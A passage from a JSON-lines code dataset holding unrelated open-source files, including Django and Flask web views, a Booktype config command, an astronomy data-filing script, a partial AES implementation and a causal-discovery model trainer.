datetime.strptime(time, \"%H:%M:%S\")\n time = time.replace(tzinfo=tz.gettz(timezone))\n time = time.astimezone(tz.gettz('UTC'))\n time = time.strftime(\"%H:%M:%S\")\n time = datetime.strptime(time, \"%H:%M:%S\")\n\n\n return render(\n request,\n \"email.html\",\n {\"time\": time, \"mail\": mail, \"timezones\": TIMEZONE, \"tz\": timezone},\n )\n\n def post(self, request):\n time = self.request.POST.get(\"time\")\n timezone = self.request.POST.get(\"timezone\")\n with transaction.atomic():\n report = EmailReport.objects.get_or_create(\n user=request.user\n )[0]\n # time to YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] from HH:MM\n time = datetime.strptime(time, \"%H:%M\")\n # time to django timezone\n timezone = pytz.timezone(timezone)\n local_dt = timezone.localize(time, is_dst=None)\n time = local_dt.astimezone(pytz.utc)\n report.time_zone = timezone\n report.time = time\n report.save()\n user = User.objects.get(id=self.request.user.id)\n user.email = self.request.POST.get(\"email\")\n print(user.email)\n user.save()\n return redirect(\"/\")\n","repo_name":"kingjuno/GDC22","sub_path":"GDC-Level-9-Milestone-master/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17491548740","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom load_keys import get_details, is_validate\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n@app.route(\"/\", methods=('GET', 'POST'))\ndef index():\n if request.method == 'POST':\n # Tipo de llave\n type_key = request.form['typeKey']\n # Recibimos el archivo\n uploaded_file = request.files['file']\n\n # Si el archivo ha sido cargado y el tipo de llave ha sido especificado\n if type_key != '' and uploaded_file != b'':\n # Leemos el archivo\n file_bytes = uploaded_file.stream.read()\n\n # Validamos llave RSA\n is_validate_file = is_validate(file_bytes)\n if is_validate_file[0] == True:\n # Obtenemos resultados\n details_dic = get_details(type_key, file_bytes)\n return render_template(\"results.html\", details_dic = details_dic, type_key=type_key.title())\n else:\n flash(is_validate_file[1], 'danger')\n return redirect(url_for(\"index\"))\n\n return render_template(\"index.html\")\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"sharon1160/rsa-key-viewer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30903867260","text":"import json\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom booktype.utils import config\n\n\nclass Command(BaseCommand):\n help = \"Set value for configuration variable.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\" \", nargs=2, type=str)\n parser.add_argument('--as_json',\n action='store_true',\n dest='as_json',\n default=False,\n help='Value is defined as JSON encoded string.')\n parser.add_argument('--integer',\n action='store_true',\n dest='integer',\n default=False,\n help='Value is a integer.')\n parser.add_argument('--float',\n action='store_true',\n dest='float',\n default=False,\n help='Value is a float.')\n parser.add_argument('--append',\n action='store_true',\n dest='append',\n default=False,\n help='Append value to the end of list.')\n parser.add_argument('--remove',\n action='store_true',\n dest='remove',\n default=False,\n help='Remove value from the list.')\n\n requires_model_validation = False\n\n def handle(self, *args, **options):\n if not hasattr(settings, 'BOOKTYPE_CONFIG'):\n raise CommandError('Does not have BOOKTYPE_CONFIG in settings.py file.')\n\n if len(options[' ']) != 2:\n raise CommandError(\"You must specify variable name and value.\")\n\n key = options[' '][0]\n value = options[' '][1]\n\n if options['integer']:\n try:\n value = int(value)\n except ValueError:\n raise CommandError(\"I don't think this %s is a number!\" % value)\n\n if options['float']:\n try:\n value = float(value)\n except ValueError:\n raise CommandError(\"I don't think this %s is a number!\" % value)\n\n if options['as_json']:\n try:\n value = json.loads(value)\n except ValueError:\n raise CommandError(\"Not a valid JSON string.\")\n\n if options['append']:\n # ovo neshto ne radi sa as_jsonom\n lst = config.get_configuration(key, [])\n\n if type(lst) == type([]):\n lst.append(value)\n config.set_configuration(key, lst)\n else:\n raise CommandError(\"Can not append to something that is not a list\")\n elif options['remove']:\n lst = config.get_configuration(key, [])\n\n if type(lst) == type([]):\n try:\n lst.remove(value)\n except ValueError:\n raise CommandError(\"I can't see it!\")\n\n config.set_configuration(key, lst)\n else:\n raise CommandError(\"Can not append to something that is not a list\")\n else:\n config.set_configuration(key, value)\n\n try:\n config.save_configuration()\n except config.ConfigurationError:\n raise CommandError(\"Could not save the file.\")\n","repo_name":"booktype/Booktype","sub_path":"lib/booki/editor/management/commands/confset.py","file_name":"confset.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":894,"dataset":"github-code","pt":"53"} +{"seq_id":"39703688473","text":"import sys\n\ndef bubbleSort(arr, n):\n \n # Traverse through all array elements\n for i in range(n):\n \n # Last i elements are already in place\n for j in range(0, n-i-1):\n \n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\n\narr = []\nn = -1\nflag = 0\nfile1 = open('../test-case-analysis-prototype/test-cases/'+sys.argv[1], 'r')\nLines = file1.readlines()\nfor line in Lines:\n curr_line = line.strip()\n # print(curr_line)\n converted_num = int(curr_line)\n # print(converted_num)\n if(flag==0):\n flag = 1\n n = converted_num\n else:\n arr.append(converted_num)\n\n#arr= [1, 2, 3, 4, 5]\n# n = len(arr)\n# print (\"Given array is\")\n# for i in range(0, n):\n# \tprint (arr[i], end = ' ')\n\nbubbleSort(arr, n)\n\n# print (\"\\nRotated array is\")\n# for i in range(0, n):\n# \tprint (arr[i], end = ' ')\n\nfile1 = open('../test-case-analysis-prototype/output.txt', 'w')\nfor i in range(0, n):\n\t# print (arr[i], end = ' ')\n converted_arr_i = str(arr[i])\n file1.writelines(converted_arr_i)\n file1.writelines('\\n')\n# file1.writelines(L)\nfile1.close()\n","repo_name":"cs19b048iittp/Code-Clone-Detection-Using-Metrics","sub_path":"vs-code-extension-trial/code-clone-analysis/type_4/test-case-analysis-prototype/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11967437373","text":"import sys\nimport xml.etree.ElementTree as ET\nfrom pathlib import Path\nimport collections\n\nif len(sys.argv) != 2:\n raise Exception(\"First arg should be a path to i18npool/source/localedata/data directory of LibreOffice.\")\nelse:\n source = sys.argv[1]\n\ntrue_false_by_locale = {}\nnumber_seps = collections.Counter()\ndatetime_seps = collections.Counter()\ncurr_codes = collections.Counter()\ncurr_symbols = collections.Counter()\nnames_by_datecode_by_locale = {}\n\nfor source in Path(source).glob(\"*.xml\"):\n tree = ET.parse(source)\n root = tree.getroot()\n for separators in root.findall(\"./LC_MISC/ReservedWords\"):\n true_false_by_locale[source.stem] = (\n separators.find(\"trueWord\").text.casefold(),\n separators.find(\"falseWord\").text.casefold())\n for separators in root.findall(\"./LC_CTYPE/Separators\"):\n number_seps[separators.find(\"ThousandSeparator\").text.casefold()] += 1\n number_seps[separators.find(\"DecimalSeparator\").text.casefold()] += 1\n datetime_seps[separators.find(\"DateSeparator\").text.casefold()] += 1\n datetime_seps[separators.find(\"TimeSeparator\").text.casefold()] += 1\n\n for separators in root.findall(\"./LC_CURRENCY/Currency\"):\n curr_symbols[separators.find(\"CurrencySymbol\").text.casefold()] += 1\n curr_codes[separators.find(\"CurrencyID\").text.casefold()] += 1\n\n name_by_datecode = names_by_datecode_by_locale.setdefault(source.stem, {})\n for day in root.findall(\"./LC_CALENDAR/Calendar/DaysOfWeek/Day\"):\n name_by_datecode.setdefault(\"day\", set()).add(\n day.find(\"DefaultFullName\").text.casefold()),\n name_by_datecode.setdefault(\"dy\", set()).add(\n day.find(\"DefaultAbbrvName\").text.casefold())\n\n for month in root.findall(\"./LC_CALENDAR/Calendar/MonthsOfYear/Month\"):\n name_by_datecode.setdefault(\"month\", []).append(\n month.find(\"DefaultFullName\").text.casefold()),\n name_by_datecode.setdefault(\"mon\", []).append(\n month.find(\"DefaultAbbrvName\").text.casefold())\n\nprint(\"\"\"# coding: utf-8\n\n# Data is retrieved from LibreOffice:\n# https://github.com/LibreOffice/core/tree/master/i18npool/source/localedata/data\n\"\"\")\n\nprint(\"TRUE_FALSE_BY_LOCALE_NAME = {\")\nfor k, (t, f) in sorted(true_false_by_locale.items()):\n print(f\" {repr(k)}: ({repr(t)}, {repr(f)}),\")\nprint(\"}\")\n\nfor constant, counter in [(\"NUMBER_SEPARATORS\", number_seps),\n (\"DATETIME_SEPARATORS\", datetime_seps),\n (\"CURRENCY_SYMBOLS\", curr_symbols),\n (\"CURRENCY_CODES\", curr_codes),\n ]:\n print()\n print(f\"{constant} = {{\")\n print(\", \".join(repr(sep) for sep, _c in counter.most_common()))\n print(\"}\")\n\nprint(\"PERCENTAGE_SIGNS = {\\\"%\\\"}\")\n\nprint()\nprint(\"NAMES_BY_DATECODE_BY_LOCALE = {\")\nfor locale, names_by_datecode in names_by_datecode_by_locale.items():\n print(f\" {repr(locale)}: {{\")\n for datecode, names in names_by_datecode.items():\n names = \", \".join(repr(n) for n in names)\n print(f\" {repr(datecode)}: {{{names}}},\")\n print(\" },\")\nprint(\"}\")\n","repo_name":"jferard/ColumnDet","sub_path":"parse_lo_i18n.py","file_name":"parse_lo_i18n.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27205423875","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\n\n\nclass UserCreationForm(UserCreationForm):\n email = forms.EmailField(required=True, label='email')\n\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n # Checking that an email doesn't exist\n def clean(self):\n email = self.cleaned_data.get('email')\n if User.objects.filter(email=email).exists():\n raise ValidationError(\"Email exists\")\n return self.cleaned_data\n\n # Committing the cleaned data\n def save(self, commit=True):\n user = super(UserCreationForm, self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n","repo_name":"BAZZM/Circulate","sub_path":"src/accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86738030993","text":"from pyraf import iraf\nimport pyfits, string, os, glob\n\nfrom saltsafekey import fastmode\n\nimport saltsafeio as saltio\nimport saltsafekey as saltkey\nimport saltsafestring as saltstring\nfrom saltsafelog import logging\nfrom salterror import SaltError, SaltIOError\n\ndebug=True\n\n# -----------------------------------------------------------\n# core routine\n\ndef saltobsid(propcode,obslog,rawpath,prodpath,outpath,prefix='mbxgp', fprefix='bxgp',clobber=False,logfile='salt.log',verbose=True):\n \"\"\"Split data into their different data directories\n \"\"\"\n\n\n with logging(logfile,debug) as log:\n\n # are the arguments defined\n pids = saltio.argunpack('propcode',propcode)\n\n # check observation log file exists\n obslog = obslog.strip()\n saltio.fileexists(obslog)\n\n #open the observing log\n obstruct = saltio.openfits(obslog)\n obstab = saltio.readtab(obstruct[1],obslog)\n saltio.closefits(obstruct)\n\n #read in the file information\n filenames = saltstring.listfunc(obstab.field('filename'),'lstrip')\n instrumes = saltstring.listfunc(obstab.field('instrume'),'lstrip')\n proposers = saltstring.listfunc(obstab.field('proposer'),'clean')\n propids = saltstring.listfunc(obstab.field('propid'),'clean')\n ccdtypes = saltstring.listfunc(obstab.field('ccdtype'),'clean')\n ccdsums = saltstring.listfunc(obstab.field('ccdsum'),'clean')\n gainsets = saltstring.listfunc(obstab.field('gainset'),'clean')\n rospeeds = saltstring.listfunc(obstab.field('rospeed'),'clean')\n detmodes = saltstring.listfunc(obstab.field('detmode'),'clean')\n filters = saltstring.listfunc(obstab.field('filter'),'clean')\n gratings = saltstring.listfunc(obstab.field('grating'),'clean')\n gr_angles = obstab.field('gr-angle')\n ar_angles = obstab.field('ar-angle')\n \n # Create the list of proposals\n try:\n pids=saltio.cleanpropcode(pids, propids)\n except SaltIOError:\n #throw a warning adn exit if not data needs to be filterd\n log.warning('No data to filter\\n', with_stdout=verbose)\n return\n\n # check paths exist, end with a \"/\" and convert them to absolute paths\n rawpath = saltio.abspath(rawpath)\n prodpath = saltio.abspath(prodpath)\n outpath = saltio.abspath(outpath)\n\n #create the symlink raw path\n rawsplit=rawpath.strip().split('/')\n symrawpath='../../%s/%s/' % (rawsplit[-3], rawsplit[-2])\n prodsplit=prodpath.strip().split('/')\n symprodpath='../../%s/%s/' % (prodsplit[-3], prodsplit[-2])\n \n\n # create PI directories\n for pid in pids:\n saltio.createdir(outpath+pid)\n saltio.createdir(outpath+pid+'/raw')\n saltio.createdir(outpath+pid+'/product')\n\n #copy the data that belongs to a pid into that directory\n log.message('SALTOBSID -- filtering images to proposal directories\\n', with_stdout=verbose)\n\n #copy data for a given proposal to the raw and produce directories\n for i in range(len(obstab)):\n if os.path.exists(outpath+obstab[i]['propid']):\n if obstab[i]['object'].upper() not in ['ZERO', 'BIAS']:\n fname=obstab[i]['filename']\n pdir=obstab[i]['propid']\n detmode=obstab[i]['detmode']\n linkfiles(fname, pdir,detmode, symrawpath, symprodpath, outpath, prefix, fprefix, clobber)\n message='Copying %s to %s' % (fname, pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n #look through the bias/flat/arc/standard data to see if there is any relavent data\n log.message('SALTOBSID -- filtering calibration files to proposal directories\\n', with_stdout=verbose)\n\n caldata=['ZERO', 'FLAT', 'ARC']\n biasheader_list=['DETMODE', 'CCDSUM', 'GAINSET', 'ROSPEED']\n flatheader_list=['DETMODE', 'CCDSUM', 'GAINSET', 'ROSPEED', 'FILTER', 'GRATING', 'GR-ANGLE', 'AR-ANGLE']\n archeader_list=['OBSMODE', 'DETMODE', 'CCDSUM', 'GAINSET', 'ROSPEED', 'FILTER', 'GRATING', 'GR-ANGLE', 'AR-ANGLE']\n \n calproplist=['CAL_SPST']\n #Include bias frames\n log.message('SALTOBSID -- filtering bias files to proposal directories\\n', with_stdout=verbose)\n\n for i in range(len(obstab)):\n fname=obstab[i]['filename']\n prop_list=[]\n #if it is a zero, check to see what other data have the same settings \n if obstab[i]['CCDTYPE'].strip().upper()=='ZERO' or obstab[i]['OBJECT'].strip().upper() in ['BIAS', 'ZERO']:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], biasheader_list):\n prop_list.append(obstab[i]['PROPID'])\n\n prop_list=saltio.removebadpids(set(prop_list))\n for pdir in prop_list:\n detmode=obstab[i]['detmode']\n linkfiles(fname, pdir, detmode, symrawpath, symprodpath, outpath, fprefix, fprefix, clobber)\n message='Copying %s to %s' % (fname, pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n #Include calibration frames\n log.message('SALTOBSID -- filtering calibration files to proposal directories\\n', with_stdout=verbose)\n \n for i in range(len(obstab)):\n fname=obstab[i]['filename']\n prop_list=[]\n\n #if it is a flat, check to see what other data have the same settings \n #this is turned off\n if obstab[i]['CCDTYPE'].strip().upper()=='FLAT' and False:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], flatheader_list):\n prop_list.append(obstab[j]['PROPID'])\n\n #if it is a arc, check to see what other data have the same settings \n #this is turned off\n if obstab[i]['CCDTYPE'].strip().upper()=='ARC' and False:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], archeader_list):\n prop_list.append(obstab[j]['PROPID'])\n\n\n #if it is a calibration standard, see what other data have the same settings\n if obstab[i]['PROPID'].strip().upper() in calproplist:\n for j in range(len(obstab)):\n if comparefiles(obstab[i], obstab[j], flatheader_list):\n prop_list.append(obstab[j]['PROPID'])\n\n\n prop_list=saltio.removebadpids(set(prop_list))\n for pdir in prop_list:\n if pdir!=obstab[i]['propid']:\n detmode=obstab[i]['detmode']\n linkfiles(fname, pdir, detmode, symrawpath, symprodpath, outpath, prefix, fprefix, clobber)\n message='Copying %s to %s' % (fname, pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n #Include master (bias or flat) frames\n log.message('SALTOBSID -- filtering master calibration files to proposal directories\\n', with_stdout=verbose)\n masterlist=glob.glob(prodpath+'*Bias*')+glob.glob(prodpath+'*Flat*')\n for bimg in masterlist:\n struct=pyfits.open(bimg)\n bdict={}\n prop_list=[]\n for k in biasheader_list:\n bdict[k]=saltkey.get(k, struct[0])\n for i in range(len(obstab)):\n if comparefiles(obstab[i], bdict, biasheader_list):\n prop_list.append(obstab[i]['PROPID'])\n struct.close()\n\n #copy the files over to the directory\n prop_list=saltio.removebadpids(set(prop_list))\n for pdir in prop_list:\n fname=os.path.basename(bimg)\n infile = symprodpath+fname\n link = outpath+pdir+'/product/'+fname\n saltio.symlink(infile,link,clobber)\n message='Copying %s to %s' % (fname ,pdir)\n log.message(message, with_header=False, with_stdout=verbose)\n\n \n\n\ndef comparefiles(afile, bfile, headers):\n \"\"\"Compare the headers in two sets of tab entries\n and see if they are the same or different\n \"\"\"\n for k in headers:\n if isinstance(afile[k], str):\n if afile[k].strip().upper()!=bfile[k].strip().upper(): return False\n if isinstance(afile[k], int):\n if afile[k]==bfile[k]: return False\n if isinstance(afile[k], float):\n if abs(afile[k]-bfile[k])>0.01: return False\n return True\n\ndef linkfiles(fname, pdir, detmode, rawpath, prodpath, outpath, prefix='mbxgp', fprefix='bxgp', clobber=False):\n\n #copy the raw data\n infile=rawpath+fname\n link=outpath+pdir+'/raw/'+fname\n saltio.symlink(infile,link,clobber)\n\n #copy the product data\n if not fastmode(detmode):\n pfname=prefix+fname\n else:\n pfname=fprefix+fname\n infile = prodpath+pfname\n link = outpath+pdir+'/product/'+pfname\n if fname[0] in ['S', 'P', 'H', 'R']: \n saltio.symlink(infile,link,clobber)\n\n\n# -----------------------------------------------------------\n# main code\nif not iraf.deftask('saltobsid'):\n parfile = iraf.osfn(\"pipetools$saltobsid.par\")\n t = iraf.IrafTaskFactory(taskname=\"saltobsid\",value=parfile,function=saltobsid, pkgname='pipetools')\n","repo_name":"saltastro/pipetools","sub_path":"saltobsid.py","file_name":"saltobsid.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15110393058","text":"import requests\nimport environ\nimport re\nfrom formClass import *\n\nenv = environ.Env()\nenviron.Env.read_env()\n\ndef checkSimplePreqs(preqList):\n \"\"\"Want to see how many forms only contain courses and logic\n \"\"\"\n count_Simple = 0\n simpleList = []\n count_None = 0\n count_complicated = 0\n complicatedList = []\n for preq in preqList:\n if preq != 'None':\n # remove punctuation\n mod = re.sub(r'[^\\w\\s]', '', preq)\n mod = re.sub('[A-Z]{2,4}\\s[0-9]{2,3}.[0-9]|[A-Z]{2,4}\\s[0-9]{2,3}', '$', mod)\n rep = re.sub('[A-Z]{2,4}\\s[0-9]{2,3}.[0-9]|[A-Z]{2,4}\\s[0-9]{2,3}', '$', preq)\n # print(mod)\n acceptedRegex = '[Aa]nd|[Oo]ne|of|or|\\$'\n accept = True\n preqTokens = mod.split(' ')\n # print(preqTokens)\n for w in preqTokens:\n \n if re.search(acceptedRegex, w) == None:\n \n accept = False\n count_complicated += 1\n if preq not in complicatedList:\n print(preq)\n complicatedList.append(preq)\n break\n\n if accept:\n \n if rep not in simpleList:\n simpleList.append(rep)\n count_Simple += 1\n else:\n count_None += 1\n \n print(f'None Count: {count_None}\\nSimple Count: {count_Simple}, Unique: {len(simpleList)}\\nComplicated Count: {count_complicated}, Unique: {len(complicatedList)}')\n returnDict = {'counts': [count_None, count_Simple, count_complicated],\n 'lists': [['None'], simpleList, complicatedList]}\n return returnDict\n\n\n\ndef checkImplicit(preqList):\n \"\"\"Perform a check to see how many (and which) prerequisite forms still contain\n 3-digit numbers that are unnassociated with a course code. Tests Form.formalizeCourseNames\n param: p: a list of prerequisite strings\n \n Note, March 30th inspection yielded 9 strings remaining, all of which made sense\n \"\"\"\n count = 0\n for preq in preqList:\n form1 = Form(preq)\n mod = form1.formalizeCourseNames()\n \n # Want to see which implicit courses we may have missed\n # Ignore things like 200-level (which there are many)\n mod = re.sub('[0-9]{3}.(l|L)evel|', '', mod)\n # find numbers\n r2 = '(?> i) & 0X01) * tmp[i])\r\n\r\n return tmp_mul\r\n\r\n # Reference: https://blog.csdn.net/bupt073114/article/details/27382533\r\n @staticmethod\r\n def __x_time(x):\r\n return Encryption.__to_8bit((x << 1) ^ (0X1B if x & 0X80 else 0X00))\r\n\r\n @staticmethod\r\n def __to_8bit(x):\r\n return int(bin(x)[2:][-8:], 2)\r\n\r\n @staticmethod\r\n def __key_generation(key_bytes):\r\n\r\n key_words = [key_bytes[i:i + 4] for i in range(4)]\r\n\r\n for i in range(4, 44):\r\n tmp = b\"\"\r\n if i % 4 == 0:\r\n g_w = Encryption.__g_fun(key_words[i - 1], i // 4)\r\n else:\r\n g_w = key_words[i - 1]\r\n for j in range(4):\r\n tmp += (key_words[i - 4][j] ^ g_w[j]).to_bytes(1, sys.byteorder)\r\n key_words.append(tmp)\r\n\r\n keys = [reduce(add, key_words[i:i + 4]) for i in range(0, 11)]\r\n\r\n return keys\r\n\r\n @staticmethod\r\n def __g_fun(word, key_num):\r\n new_word = word[1:] + word[:1]\r\n result = b\"\"\r\n for index, b in enumerate(new_word):\r\n result += (Encryption.S_table[b] ^ (Encryption.RC[key_num]\r\n if index == 0 else 0X00)).to_bytes(1, sys.byteorder)\r\n\r\n return result\r\n\r\n @staticmethod\r\n def __remove_PKCS_7_padding(x):\r\n remove_num = x[-1]\r\n return x[:-remove_num]\r\n","repo_name":"EnigmaZhang/MyAES","sub_path":"Encryption.py","file_name":"Encryption.py","file_ext":"py","file_size_in_byte":13478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17123158657","text":"#get possible domain names\n\n# Complete the getPotentialDomains function below.\nimport re\ndef getPotentialDomains(lines):\n pattern = '(http|https)\\\\://(www.|ww2.|)([a-zA-Z0-9\\\\-\\\\.]+)(\\\\.[a-zA-Z]+)(/\\\\S*)?'\n\n regex = re.compile(pattern)\n s = set()\n for i in range(len(lines)):\n for string in lines:\n iterator = regex.finditer(string)\n if iterator:\n for match in iterator:\n s.add((match.group(3) + match.group(4)).replace('web.', ''))\n return (';'.join(t for t in sorted(s)))\n","repo_name":"SatyaChipp/_Hackerrank","sub_path":"Millenium/detect_domain_name.py","file_name":"detect_domain_name.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21436371975","text":"from __future__ import annotations\n\nfrom collections import defaultdict\nfrom copy import deepcopy\nimport os\nimport sys\nfrom typing import Any, TypeVar, cast\nfrom collections.abc import Sequence, Callable\nimport random as py_random\nfrom concurrent.futures import Future, ProcessPoolExecutor\n\nimport numpy as np\nfrom numpy.typing import NDArray\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Optimizer\nimport torch.nn.functional as F\nfrom torch.optim import Adam\n\nfrom abpnl import AbPNLModel, NtoOneDataset\nimport stats\n\n# T = TypeVar('T', bound=np.generic, covariant=True)\nT = TypeVar('T', bound=np.floating[Any])\nSEP = os.path.sep\n\n\ndef pp(*args: Any, **kwargs: Any) -> None:\n print(*args, **kwargs)\n sys.stdout.flush()\n\n\nclass LogItems(defaultdict[int, dict[str, Any]]):\n def seq(self, key: str) -> list[tuple[int, Any]]:\n return [\n (_, self[_][key]) for _ in sorted(self.keys()) if key in self[_]\n ]\n\n\ndef to_csv(\n log: dict[int, dict[str, Any]], sep: str = \",\", lastln: bool = True\n ) -> str:\n \"\"\"\n Convert logs to csv-formatted string.\n\n Parameters\n ----\n log : dict\n key=iteration, value=dict(str, numeric)\n sep : str\n delimiter string\n \"\"\"\n columns_ = set()\n for _, l in log.items():\n for c in l.keys():\n if c not in columns_:\n columns_.add(c)\n columns = sorted(list(columns_))\n\n s = [sep.join([\"idx\", ] + columns), ]\n for i, l in log.items():\n s.append(\n sep.join([str(i), ] + [str(l.get(_, \"\")) for _ in columns])\n )\n return \"\\n\".join(s) + (\"\\n\" if lastln else \"\")\n\n\nclass AbPNLTrainer(object):\n def __init__(self, params: dict[str, Any]):\n super().__init__()\n self._params = params\n self._causal_order: list[int] = []\n self._adjacency_matrix: NDArray[Any]\n\n def _check_params(self) -> None:\n keys = {\n \"logdir\": \"str. A path of log directory.\",\n \"max_workers\": \"int. The number of parallel execution.\",\n \"n_trials\": \"int, The number of trials for one model learning.\",\n \"pruning_threshold\":\n \"float. Threshold of p-value used for pruning.\",\n \"n_epoch\": \"int. The number of learning epoch.\",\n \"n_units\": \"int. The number of units in a layer of MLPs.\",\n \"n_layers\": \"int. The number of layers in MPLs.\",\n \"activation\": \"Callable. The activation function.\",\n \"loss_balance\":\n \"float. Relative weight of loss_ind against loss_inv.\",\n \"batchsize\": \"int. Batchsize.\",\n \"dropout\": \"bool. Use dropout.\",\n \"optimizer\": \"Callable. Optimizer.\",\n \"learning_rate\": \"float. Learning rate for the optimizer.\",\n \"interval_test\": \"int. The interval of epochs at which to test\",\n \"interval_save\":\n \"int. The interval of epochs at which to save the model.\"\n }\n for k, v in keys.items():\n if k not in self._params:\n raise ValueError(f\"`{k}` ({v}) not in params.\")\n\n def doit(\n self,\n x_train: Sequence[Sequence[T]] | NDArray[T],\n x_test: Sequence[Sequence[T]] | NDArray[T]\n ) -> None:\n \"\"\"\n\n Parameters\n ----------\n x_train : Sequence[Sequence[T]]\n Training samples with shape=(#samples, #variables).\n x_test : Sequence[Sequence[T]]\n Test samples with shape=(#samples, #variables).\n \"\"\"\n self._x_train = cast(Sequence[Sequence[T]], x_train)\n self._x_test = cast(Sequence[Sequence[T]], x_test)\n self._variables = list(range(len(x_train[0])))\n\n os.makedirs(self._params[\"logdir\"], exist_ok=True)\n while len(self._variables) > 1:\n self._find_sink()\n top = self._variables[0]\n self._causal_order.append(top)\n # self._prune()\n\n def _find_sink(self) -> None:\n logs = self._train_all_ntoone_parallel()\n sink = self._select_var(logs, \"loss/test\",\n \"loss_ind/test\", np.median)[0]\n\n self._variables = [_ for _ in self._variables if _ != sink]\n self._causal_order.append(sink)\n pp(\"causal order:\", self._causal_order)\n\n # logging\n pstfx = \"_\".join(f\"{_}\" for _ in self._variables)\n # selected models\n logfn = self._params[\"logdir\"] + f\"{SEP}models_{pstfx}.csv\"\n csv = to_csv({_i: _d for _i, _d in enumerate(self._log_models)})\n with open(logfn, \"w\") as f:\n f.write(csv)\n # stats\n logfn = self._params[\"logdir\"] + f\"{SEP}stats_{pstfx}.csv\"\n csv = \"\\n\".join(\n \",\".join(f\"{_}\" for _ in _l) for _l in self._log_stats\n ) + \"\\n\"\n with open(logfn, \"w\") as f:\n f.write(csv)\n\n def _train_all_ntoone_parallel(self) -> dict[int, list[LogItems]]:\n \"\"\" Train all the possible n-to-one pnl models. \"\"\"\n futures: list[tuple[int, int, Future[LogItems]]] = []\n with ProcessPoolExecutor(\n max_workers=self._params[\"max_workers\"]) as executor:\n for effect in self._variables:\n causes = [_ for _ in self._variables if _ != effect]\n ds_train = NtoOneDataset(self._x_train, causes, effect)\n ds_test = NtoOneDataset(self._x_test, causes, effect)\n parent_logdir = \"cause\" + \"_\".join(str(_) for _ in causes) + \\\n f\"effect{effect}\"\n for t in range(self._params[\"n_trials\"]):\n logdir = f\"{parent_logdir}{SEP}trial{t}\"\n self._params[\"l_logdir\"] = \\\n self._params[\"logdir\"] + SEP + logdir\n self._params[\"l_seed\"] = np.random.randint(1000000)\n params = deepcopy(self._params)\n if not os.path.exists(params[\"l_logdir\"]):\n os.makedirs(params[\"l_logdir\"])\n\n future = executor.submit(train, ds_train, ds_test, params)\n futures.append((effect, t, future))\n results = [(_[0], _[1], _[2].result()) for _ in futures] # Wait.\n\n all_logs: dict[int, list[LogItems | None]] = {\n _: [None]*self._params[\"n_trials\"] for _ in self._variables\n }\n for effect, t, log in results:\n all_logs[effect][t] = log\n return cast(dict[int, list[LogItems]], all_logs)\n\n def _select_var(\n self,\n logs: dict[int, list[LogItems]],\n key_model: str = \"loss/test\",\n key_stats: str = \"loss_ind/test\",\n f_stats: Callable[[list[float]], float] = np.median\n ) -> tuple[int, float]:\n \"\"\"Select an index with the minimum criterion calculated over trials.\n\n Parameters\n ----------\n logs : dict[int, list[LogItems]]\n All LogItems.\n key_model : str, optional\n Key to select a model in one trial, by default \"loss/test\"\n key_stats : str, optional\n Key to calculate stats over trials, by default \"loss_ind/test\"\n f_stats : Callable[[list[Any]], Any], optional\n Stats function over trials, by default np.median\n\n Returns\n -------\n int\n Index that achieved the minimum stats value.\n Any\n Its value.\n \"\"\"\n models: list[dict[str, Any]] = []\n measures: list[tuple[int, float]] = []\n for e, log_e in logs.items():\n measures_t = []\n for t, log in enumerate(log_e):\n i = self._select_model(log, key_model)\n record = log[i] # Log record of the selected model.\n\n # AbPNL sometimes fails to reconstruct the effect, y'.\n # Remove such trials from calculating stats of the model.\n # In such trials, y' becomes a constant, thus MSE~var(y).\n rec_ok = \\\n record[\"loss_inv/test\"] < .5 * record[\"y_stats/variance\"]\n if rec_ok:\n measures_t.append(record[key_stats])\n model = {\n \"__condition\": e, \"_trial\": t, \"_reconstruct\": rec_ok\n }\n model.update(record)\n models.append(model)\n measures.append((\n e, f_stats(measures_t) if len(measures_t) > 0 else float(\"inf\")\n ))\n self._log_models = models\n self._log_stats = measures\n k = np.argmin([_[1] for _ in measures])\n return measures[k]\n\n def _select_model(self, 